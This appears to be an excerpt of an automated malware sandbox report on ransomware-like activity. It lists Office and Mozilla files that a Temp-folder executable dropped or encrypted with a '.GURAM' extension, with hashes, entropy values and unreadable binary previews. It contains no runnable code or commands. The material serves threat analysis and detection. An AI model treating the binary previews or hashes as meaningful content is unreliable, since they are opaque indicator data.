                                                                                                                                                                                                                                                Preview:5..c5Z.W^..y.%.d.m..c.k.d.........E.j.q=..o]I.Q..!..9}....!.T\.E...A.i@)...u.\.{..m.9C..sW..`....~t&..{j-.pt.1.2.kl..#..C......J..y...[W..B.X.V.....*...&.$.\.x`#4."j...Q;.i4.cE.cB.[h....6.......|%.D...4....w....?.c..y..v0.......$s........>......A.~].'..'?..B.u..YK.....p......m\....-Y ...!..O..i|f.r..(.n.6.y.<.V.XM..Jk........RK)R9..!<...k..M^..R..\.I0.!.<Z.~..u..f.._..N0.E..j..,.M.......M..).WI;.......o........a...&..'x?...{.H...a.H...K.F4..F.1-.".j..R.H..i`..&.......o...7z..6yr......>L.~*.f.....d.)..z.*.&.puw.....lV.C9+...^Z........]6w..xA......:.."...Q...+.........2.P..A(D.<..7(.JxM.*....5...[_o.8...M..7.....!Yc..~.o.{..U.|...O.Hk@.E[..h....=.....`^..$Z.y. c..H[..%.W..k`..6..@$sK.7-.".r."...,.F'w......2....i...?.(.x...yh.....i....|_.#....$dhK....T..'.W...0.V.-.....w..Zc>K....!....S......@;.=.f$i..A3.*.(....f.....j...p...{......g..obu^..K!.L.-.7z...{..U ..|...wN.J...../A..x.2A..CK..#....u@\..n..._...%...tX..\......7<b.....:.y....=.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00E2-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1900
                                                                                                                                                                                                                                                Entropy (8bit):7.900144014406995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:QyVOtQO6n/pLr0mlhEgQoVoxpkXv4XwU06Y74o0jZtwv5:QyVOtr6n/pMkhENo3IKMleR
                                                                                                                                                                                                                                                MD5:394E365678D6DC9A5896C9EF87E3805A
                                                                                                                                                                                                                                                SHA1:48F7B6C0C495F6DC073837228FA58AED73F05192
                                                                                                                                                                                                                                                SHA-256:F77BCD41ED343E3B6D5B8FC4F9365EF0A43982739D97B1B976910EF65B32126E
                                                                                                                                                                                                                                                SHA-512:85C99DDAF42F504DC7E81050ED87295CC82C5628047F7B4F6E83641FAF43F2151D2C18AB2BB43918D5B7C81F2497B3A43D51E445740622FCF9FA4D2FFB21C8E5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:3..x.......#W-.*SO........u.oO/...k%..6..,.,.o....y.mV...}...}....w.O.M&..>....]._.B`...n*.T.G3T.P3.n.Z..f...`{,_9..2j.B..-....q.Nw.......vP:..*..?Zj..?.O.ip...Y.............D..z./&`........|...XrEA{...".S].j.OK9..Cl.......T.R..&.-I..e..iY}.Q*....2K.S.........R.h....t..H..nH4...:|.g...z+..0-.x3v........;......I........h'...........S.;>@9...9.R./.<.U?.z|."r..u$.......N...r...h.:-..L......n%..!"iyj..h...:S........)...vbX.......:\T.......x..<k.9=...D....aXn.L.X......d09Q.@..4..>..%Si.....w......./>.(,....B.:3...qAq..Aw,......fYF.V=..i..5....iO.....#....&eZ.?[NR..^}.......8.._...'...\$.-.$/.....7.....2. ., q....T......@e.7.G.O.pp.e..e..<...B....~.$..{tk\&...2s[^..Os.g...4<.....p]....5..e.k^..0...K.:4.<{P.3.. ..YO./......X.Jz(.....$X]../.t....t S.08QI|.rH..5.".....+.....3G.,.T.......K.i..\:.F......P.|.k..x...!7.....a. u".....^.@!.+.!..r.....a?.j.,.<ytNc#.j|....,.[.]~D.e.a$...Ex..@....(..+&< .CT5.p..9.......e.u6[Y..6...J.._..`jq.&<.w.V.;...gB.%'

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-012A-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):552165
                                                                                                                                                                                                                                                Entropy (8bit):7.050427671197534
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:OhlHJt71ecuS59CUgJF4h82gqtdU7QeRi5cB1YgAMFnwNS7:6HvAcuY9+Fd87QRiceUOm
                                                                                                                                                                                                                                                MD5:93ACD54270EB53CE14D70F65811ECF39
                                                                                                                                                                                                                                                SHA1:57AF9A3D4DB838B024E48C4F41EAD60F6AADAAEB
                                                                                                                                                                                                                                                SHA-256:B8AE824DD08EB3DB4D7ED57D61F92ECF56940881084C1EAAB7ED8BE83ACC561A
                                                                                                                                                                                                                                                SHA-512:6F81F1F6CA4432AAE2680A9D78BF53C41007E82ACE17762E7A3A5B3AB010FF6C58162AD3098A0CF4663F9DD514D9F329AD2BDD27E9BFD6FFEE272022AA7A78CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...<t..(2.......:.h..oH........%.y..z.j..EP..mr...m.R....[6:k.S.[3.6...|..y%..s0Ax...3.8S0#J.{....G./..J....\.kB...N.S5.,\....7'...%f.. I...v.H!.5..`3......2D..^T......e^k{...%.L.G(.PH..."L..%.G..5..T%.../..~(79%.%..w........Q.. .!."p......E...FG...r.a.....N...<....O.K..d..+%.L..}....3V._..'.W.>....!(.9...PV...y.8.(.&......d...}..C.8\.f.....I.u[..?.].{..r>.P..'..b&.Y.C{p...w.....H....~....j..V.;4b...Y...W%.a3m[.....'.DW...I0^t\;......7.6.....xo.Oc....H..(..7...dn..."..j~.7...L..?...t.?/...J....c.Sgq.G.U..U....D.3.9.V.s:"..3.z.8...eGq..r.dh!%...W.k..IO..^o.....i.%.hA!..F......NlS..KbL.vM.r..p.".....a.(...2Z...,...m..*..[.-H.....,.;.y.z..D...S%.t..S....vZ.._.z"..6[.r<~......k....q;`..,.^.vt..3..c_..+Y.(....O.....C\.>..c6...>.x........@].v...E...`.....h.'..}.!t..,.rm.Db.....^.JO.}......Z:;9@...........e.! b.ZV..@\....i...........(....0{.le.~,...m...~X.-.a.y..Z....f.S....2..*...ZK.@%..."....P5r..<.?...y..0....K..8n.S.dl.U+0B..]W......egd#.....F..1.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-012B-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.893911967394004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mW4IUC7rShab+iuYct4HKVkPy3TV8esveAr7losOi/BlwYMvPuqv7mjmJrc0YXUr:mBCXSAalIVAJylos1pCP744o0jZtwdSJ
                                                                                                                                                                                                                                                MD5:57667DEA16EA4032BFCEF072E9169CB2
                                                                                                                                                                                                                                                SHA1:3F825102F9179D9730BD261EFD6C799646E90E83
                                                                                                                                                                                                                                                SHA-256:A2BFBF967EFC7DA8F36F44D76CA47A1780A3F5895ECEBC339027199E178ED659
                                                                                                                                                                                                                                                SHA-512:5E080EEA444210D56E7525AD2D078B951F4238F95B6171DD492A321AEDB22FEC7BC64A77866643A880E8554B4C9B2BE6B0EBAA1B0844F18F1CCA8C66ACE3CE53
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g..;.k]*....W...\.2.@7...@..tCh....J..........f..p~.....:.P6`....{..........u.k........-....9.....o......J.Fv#_...0...=$.P..>V...;+....q...hW..i.T.(D1.FP....A.....6..cu..5..&O/S4..(.w....u..?.c...T...........N.#*.s...M.Z.+...o-..p....0-/.43....v.M....~.D...Pm..k4..YG.O_..+......P=.h...]..Ju.?..o....../.....Fw,.Y...*A..+{.,....L..=]...*l...V...4n...-Z.P....rmU..ep..*.7...!X]...6.O..X.I.4.&,.=..0F.U.Yo..0=..aT.r.r...D.^S..?....,...=....Fe6+....v<DQ.x.......:....:..O$v..=..d:J..#......Cn.X}.f&..Ij.P..eg...6U..vL....T......>.Zs............`.....~..e....k6^.. g0.1<..\....VVU.[-.86...!...........v...|mM....5F9C'.o.....|....sh..g./....$AU.\.h....g.[...B...3.f.......,.m......S....i5.^..L%i.......]...../.^.(e......_1So.~".X9].9..[t.V.q..hi........U!......3B@.%.u7..?IK.G#.v.H.")...Y..P"..Lt,d...y.....'.............e....2..\..~..>...k.!.VS.).d............7..6\.lY.LyEr..X..\w...%.H&j..l-.3..#.c...^.........|..bOIy...Z..[...a%..}$...%#.^L..I...7..F$

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-3101-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2809
                                                                                                                                                                                                                                                Entropy (8bit):7.938853200234973
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:d/WtMhIwf7SIaJgwhVSLCkGGzrNKQqF0earqPR2r5cWG/04aeQ4o0jZtwDYk:FSwTSTCooLCxYrNLu0earqZV/0Rehlen
                                                                                                                                                                                                                                                MD5:884F5DFA5BCDB684C5715008F97B3159
                                                                                                                                                                                                                                                SHA1:8C334467C99A6C0CD1BB406D7219FAAB616C1A61
                                                                                                                                                                                                                                                SHA-256:7B41B1D16DD5E89D5141E53782DFDA3A947B185768C8633C4E56409B5A5AC6F9
                                                                                                                                                                                                                                                SHA-512:507FE2BEC4E48C5434090AA0AF68DF1F827AE4421BB2A64279CFDE36335BBE326839C5C178D826CD7F9D7D8E26636D76E45CF30A553F61DB49DB02F3EC8655CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........s>.0uL..a....Uv.........;........j..9.wT...).....HPM.%Y4.gePq.B'..<..><".GV.....1....f.<.E.N...&..............D...@_..I.0..q.8.....#67....P....&:.W./5P..].d.G..F[u.0...vR...2/...X[..*.<G..`...!=..1...y.....]<.,.@@.A....0n..~>.a.Cs..Q].dr..M3/g.qpxb.o ...0.>@}.....n D..y.'.O.s....>.....0k=.7e.].z.@......_'.z......9/..$.=r:.}.K..MAO(.F.}R..b...4.#.H.$.-.>.$N(p.-..m...=V.._q.'.5......'....-Q...........A.."....nu...lV...*. ... ........E.x./...!..W..U_.82..v.............M.B7 ...vX.......?X2....Q..=...0"...`Gh6...I^...l...Sn..0...!...X...r.N../..s..5."l..;...GI....9..2c1....2...;.LX.9......h+...(V...z...`2.!_ ....8Q.T.:....|...f..+Aj`N...c.(X..i.ya....C.....mWo.<.@....C....x.(j-..-.",4+w.U6@fe.5pux....\..>..D......L.....'.".....7-).i.....'.A..iB`..4?...b......]..*.7M..c.(S.a.>d.d..<o.... ...-.G.i.4.&..m.s9Us..}..&.-.B.[.}d...f....BZN.SI5.*%$...".H..Q...)...q.O....g..l..c[.M.B;.8.Q.<O..|...>J.t....?.9..S.........Q._...]. 3.*4.U4....O..

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-3102-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3734
                                                                                                                                                                                                                                                Entropy (8bit):7.9533990450533265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:DVEr6OJtDBGjK1EevEaI4nU6WCY+CFJogR56leK:D0ZPBGj8EevEaI4nU60+Vk6UK
                                                                                                                                                                                                                                                MD5:CCED7B2541809414867622E51142B4F0
                                                                                                                                                                                                                                                SHA1:37777389610013CB83E73D29E5C1D64A15140A62
                                                                                                                                                                                                                                                SHA-256:053E033AB2B577D2698031DBB098DA6AFE5ACCBDD8F1B2A0B1A084ED9BF9CB96
                                                                                                                                                                                                                                                SHA-512:27D128912EC9F3C24976C4D4A1839C449696379E32075FC7F05E6090A6ECB2BCB64917CFEC577B99295CAAA4B9616E319B9DF6A998B62BD560281B9CFE9F187E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.-d.]..asV.?*Z.K..#....../..3n.q.7.52..D..}...XbN.a.z...=w.9?,........L.4M._;...Ev....y+l.].....>..c.....*....&@..2......x.V...Md..;(.4.sX....H....H...%......3<+.c.|.....3....}........j..Lc....N..aP.:.f.4..,;.I.(s;.xUV..I..tHV...&.c........b..Ao.Tb.B....A@...8Q......d4..L+........&%,&$...}Cm.e.v..8..7........S.h2Q..R....rL^.P.z....H...6.\+!.f.O.W.z.).UD..`UG.:.4)...9R...j...I..M.+g\.......p..6s.o...:..2$.wd.|..".hF..!u.{...Uz..`.6DCv./..K..+.&.G.e...+....._G.mZ..0m...UF.|......! w&K:...{Xw.T.~.t?....'..@S....W.=..M.v52..z.....!.I.H........t..sx..Yv...z7^.5d.?..cT(..<...FY.h.....)#..3.Bft;.....I....l<.:...u....2.W..wO.*.Y......"o".<.6*.`[+om.yvG... .t...<...%].Z.i...Z...'.Z.o..Tn...-...f6.(.:.0x...G.~D/..w#...x.R/.'U.....Ysm..~...i...N...~.....e9...4=#{Q....$...)xhQ".\..e...<..E.7......C.........).K...*L......k.l#|...9..........CP?xt~*.............@..^......m... .kY_..l-..9P..1..%..S..y.~.".=.%.......\p.W...llA.._aF.:.<i.....F..w('HJ._

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.common.16.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2015514
                                                                                                                                                                                                                                                Entropy (8bit):4.909792042715636
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:ZHLOwqQzVtGy1wVRGKYQMDrvdfodZji6wR2kOZS:ly7QzU7JYkji6OfuS
                                                                                                                                                                                                                                                MD5:04058E6773BBF4738CE71EEF7103E996
                                                                                                                                                                                                                                                SHA1:ED35C480AD5C98A0A7EA82F05FDD8D284F496340
                                                                                                                                                                                                                                                SHA-256:8A42F39CFD85ED66D956251BFFFBF1F43F2555EFFAA3C15BE3F761B21037AF45
                                                                                                                                                                                                                                                SHA-512:28FACBA41E0B6FF8D1A730588D459BB375C14B8A7183087DB5875F783FF1AA40FF4552703B9196E8545D4142AB09F6B2AEAADE2901D6E64EEF8B98D1506AA2EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.^.....i.a!M..;.yM C..b....[|O;...,v.-...{....\..$QH..A..."..:l....@6...-.s9.~.1.............kG...2T.|`7!..Qe....+cbS:9..D....Q......-....,.7.2H1.[....-..>. A.q'o...{..T..E...K.so..FN.S.....x.i.y.*..m/..!`@o_...>.....5...c...J....hQ..zY...@.q..1..Ju.7.r....cC.H.|.;I....B..Cp-....V2.......b.l..tm.2.L..>!.?.3.N.R.N]._..zyI....8......M..~<.=..z[..... .{...k).%C...J......Z.+.+B....x.A.......S.JS..U.3L..&J..z.<9.dRC.g$...R`.*Q.{P5.'04..I..K.1:.by......o...........%.nZ:7.....].T.).bV.....#.E..)N4I../U...+w..a.6,bCn...8.M}...|7:...m.......D..m,..)..h .-...4q..@>..IS........0.N...C.y...1O>\u....q=L..\.y..z....e..7Cx..s.OU.u..bX.G..}..b..v.w......Z.{...~...pG....,%.....`X...6......T.>...'..C.G4....YZ...v`..Y\m.7..`i...C.d.&.4.0Y~.:f.aE....j../.bZ......W)n..1.M....f....t}t<..ZZ....=`....m..d..[..}.%...~.3..S......9t4T..6nE..7...=o....9h....a.9&.`.P...$..7!..!C..W.6..X.f...]..5.+...?*.r.Dd.FW.|.....my...YIkTh`F.........P-....x.6q.EK.....2V?.-.v......c.uy.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifestLoc.16.en-us.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9698
                                                                                                                                                                                                                                                Entropy (8bit):7.979349240414599
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:MciInXFBlMk/plQ8Tg50MnCTK3pD1URJE5ullWgUH:MUhhlQ8Tg6pK3k9HWXH
                                                                                                                                                                                                                                                MD5:2F0C195F67F94D300064049B351BEB1F
                                                                                                                                                                                                                                                SHA1:907A0F9886C3B9E12EE7ECE542F34055915FD7F3
                                                                                                                                                                                                                                                SHA-256:253E00DB3B3863D201949320D96DE957D341034D014C038E92C4B27C8B24DE61
                                                                                                                                                                                                                                                SHA-512:3FDBC93BCA92DEC3C27BEDE96CE4A4A2B056EB8728FA5094306C69CA394A80FCC51371DD9A80859F420DFDAFE2CB08BC927F8FE9C9E5215F7CAE736357F14EDD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.1..ym..p..x.....:..H.^.;.X.i*.k_t.a$..]IE..0..B.......m..?.t@.....y/..@..9.H@.u=.....Xg~.~..1N..#.52.....PjL..f..G.d.-h..D..........S.C....).7.....O>z...X.7.X3.lz.\.........Gr.u(L.m.......b....n^.d.>........j'B.....#31s....G#.......?..........v.EU.L....I..O.....2.:..cx.ae;...+.....".Ib.\..o..S...g*<...}L......W<..bq(f......U.M"....z..r.rA*.g.....ad:*+....Sy4.P*......G............Z..U.8.r-.. ..za..Y.(.r....p...!b..4.........Y.\...^..(.i..Yv2.N.6.}ck.R.a.3..s.dWfav.p....?..eA3.....t..h...#.%.."+..j.p.......L.r.....<...|..n..w(.-.n.....L..`.sX.........o..........X.P..C..9..4.]X.:...q.n..@......(...%.RO..w.`)...Jc.Oc..q.i.>..".|\.{..J..F.....;.]..`Q.. q.-...J.a,.".cst...HW.\.@_...4..8....<Kz.]:{-O..i.S...cu._Z..c.:..hmb,.rSrr..0.Hm.......KK....5.a[....\..S............a;-..$T..*vM..5e.Q.{...Ts;cC.62b.&.....|\s..5...H..S..hm...!<X_.8...(.s.8ZJ..5..].F..b.p8...0d"/y.#/"Z...aG...!..........^. Z..[.Ga.(.z.c>...^.5c..f}...o.1..>=..nz0.......

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AuthoredExtensions.16.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):981
                                                                                                                                                                                                                                                Entropy (8bit):7.7834319891850825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:WZc7YBacMibX+V2eKKU6PYZ7w0LLGX2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJuy:csW3b9wU6+UU5jmJrc0YXUZtwsT/rqxs
                                                                                                                                                                                                                                                MD5:A3BF590FA231B80622D916C20CC9D0C6
                                                                                                                                                                                                                                                SHA1:7EC8DADD4F6C30F9A92FC380DA3DD25A6EA14DAE
                                                                                                                                                                                                                                                SHA-256:3891D71398191720561C82B12E659E4DF5051E28DBB32B4418ED8539319B13D5
                                                                                                                                                                                                                                                SHA-512:1A585CB759DD94962C0FF9E5F43414EB60AE37952A7DB3CE87E9C7A3C580B130ABFAB63777E2AFAEB4FEA5537F7D47045807289D6B4F43BE67E7FB9EC9FB90F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....%R8...h.]x.!i.&....EO..@.c.-...W\LL.0.[.j.G.R..[@+$M.'..L... .HFv|/B.f..Pl.,...6.N.....%.R.E0......I. |...Q.n-.....h...mR..P./!'&.1{\h..E...]<...?Z.F..l&4|....Z'.n7y...^.Q..._............b......j.T'#..&$w..d....4&<.O..s*V.v.'e.W{.2}m9....N+b..)!.&.-.ZE...Z..%;..[...<j4X.y.e.j.jl.]..sA D.6.).l......>...X3...b.....V.I.... ...R...C...."......G.bK....n.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....z.='...W...4...U.x^.U....vG*.L.].u...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\ThinAppXManifest.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5219
                                                                                                                                                                                                                                                Entropy (8bit):7.957742910009899
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:8fr5qkcPTtJUVX/64yBh8cKNFtYaMocyjglkcfeeN7uRvZ5IPAO2LuleSc:8VUP56X+xKNr7RXfWN7YRFOdUN
                                                                                                                                                                                                                                                MD5:EFE91DEBF1912903BEC0E84807BBB904
                                                                                                                                                                                                                                                SHA1:2BB10E23C7C61D91F9B0412026B0C4F732710E72
                                                                                                                                                                                                                                                SHA-256:41BAF541883BBFEB5CBC3670CA1721F32C62AB2444D53C6188812C4A95CE61F1
                                                                                                                                                                                                                                                SHA-512:E14EBFE048D5BACD17DB67A69A376C9EFCAE577938D9B735B7F072601FA6FA060A9F451FBD0039F3C33B09903375F1D71B4ADF62D911B16704423220BF774EB6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:h.[[.c'.;..X..nC.3.......l*.$.j.4Fv.....{....7.J..**...B{........%..9....K..Z,.S<.._...B`..\9uu|.MS.O..W]a.>..G5.j*...WQ].,.b.|..v.k.O.5.F.S....]l.=(.wCk...yN....Ep..+/W..]8..!.A.D.Q...m_F~...*..S.Z...&..K.}..*.......u.A.g..B...X.E:q..*........9-G.,....8,G......>'.....^.?^!.K........J..x....w......A...+..s....b..=Wy.....7.q..v.g....7...K....|gT.';L5..I.)/O...g"k.......qZ..GT.....?_g........F..M.co....y./9M..)<q.E^o.k.@..$.z8C.....j.@.....Q...w.....}A.........=.b=..i.c.RW.rQ....p....I....Tr).P\f?....m..n`=CG..g..O.............C..L$.<....&..(/7..nn{... o.r..4?.n'.U.p....`.....s"~.g...R..n......o........S.../.6.....i.&...F.........).8.~..U.....;2.4.V7.H.....8p.y.{.gg.WV.i7Q>...1...q.LJ#b`..u.x..V9......x.*..Qe....>tT.`w&.....2.:.s.3.......3..1..y7.N..JNcm.<.k.[..8A4CK.F...%.[.Z.......).(.9.R._\..}.^...5._pq.A{G.x.@._.....oE......k...`...ON....^...g.K.Br.{...(j..W......b.L'..^...P.)..E..L......@.Z8V-..\....H..2b4....E%.....0....AQ|Mh.......U.rq^x..

                                                                                                                                                                                                                                                C:\Program Files (x86)\mozilla maintenance service\Uninstall.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):104002
                                                                                                                                                                                                                                                Entropy (8bit):7.998585778826238
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:DZHwWvZhgsd2Zttd6lorgkH5AMUEPHRNTZA238J+v2HBjzP8290b5ZGXFhY584C8:VQWvQsdIrAcxNJ9UBPEk0b5Unz4CMUs
                                                                                                                                                                                                                                                MD5:73D6DDF0305FCCBD53A4835E077BBBC0
                                                                                                                                                                                                                                                SHA1:1C0A3435E5A941B98CC886A2E25A54C8EBB39DF0
                                                                                                                                                                                                                                                SHA-256:699A08EED086028121E7F2540F0C84534E6CCDA00FF8CD39C6E3D07EAAFC73A0
                                                                                                                                                                                                                                                SHA-512:C16B92172EC2DFD667C485C933D76C29964C1E6B2959D2E94DB15CB618F2C249E39B5A9888055A73F139B9829A07CB64E2E4F47A59D609F4CA2F7E86BBE61665
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.(.\/.....9...^J...q;..5~.}.R......A..|...........V....Q...MB+F.<..i.H...}..P.+.l]>..q...D...4.)j..@..*1..-..:..(.f.(.!....>.....5u2$s.Q...*.q.H..C..'...Q....... *c..0..4..&.".v.F.......W.z..v......(..T.+F..c.....$...-.~u".R.J=;.>.\.&.8...?.=..0.<Qj.D`k....O..X..$..."[.1.[a5.OT_*...d.`..u.......\=....s.........._.......Q...k..._X.1.p.-..o..\.v_.. .uL.1..%....v...2.<D..N.......$.r...i)=%..f^.u.s........;..(..x.c.....7........D.o......"..syy.*8.2.g.Z..C...@Bu...e.e.-....4...0..g3D.BA..i.adS..@r..|.,)......Q..F..sBEhzxxR.^G....^...bZN......^.[:.C#1...k|v..7......[Ea....z.%s..Jb6...+.DO0...6.B...B{U_..2`WqA.......l^..w....N.#...G.p..;...M:...........w.Tv....<...mr......k.`=...k.&-..cW8O.v......F_........o.J..vP.".......D.n.G....-~..Q...... -[a...l...?p..i.3y5....;......O..)E.... ...B..@..............'..|j./...!...................h!|])....`q...P#.!....@b.._/...k...L...iW..)..k.Od....J(.B?'D......jVV7.b^1.k.m..."Zh......_.!.]].J.1...>..2...u..z..

                                                                                                                                                                                                                                                C:\Program Files (x86)\mozilla maintenance service\maintenanceservice.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):239616
                                                                                                                                                                                                                                                Entropy (8bit):7.999202468035808
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:THBdKab55HP+uMZD68MyGfkgf2F9N7sfz2LsH0:tMaFkn688kgfaRu2LsU
                                                                                                                                                                                                                                                MD5:EAB2A9A136327C0EB4F764EBD3765896
                                                                                                                                                                                                                                                SHA1:D5B2C334E6681D597AE897AB594EA558CD1C5F33
                                                                                                                                                                                                                                                SHA-256:1EBC3E2CA202098BFA630981ADBDE36C513E4C4764C6F8540712EF705534FBC1
                                                                                                                                                                                                                                                SHA-512:6599100F7CEEEFD957E20DE04C87558AF243CD6DDC8ACEF4AE64325B3BD91B563374C1730928D7E023AE0B503563E9E614B126D2C8CFDBD3BADD61467258F354
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
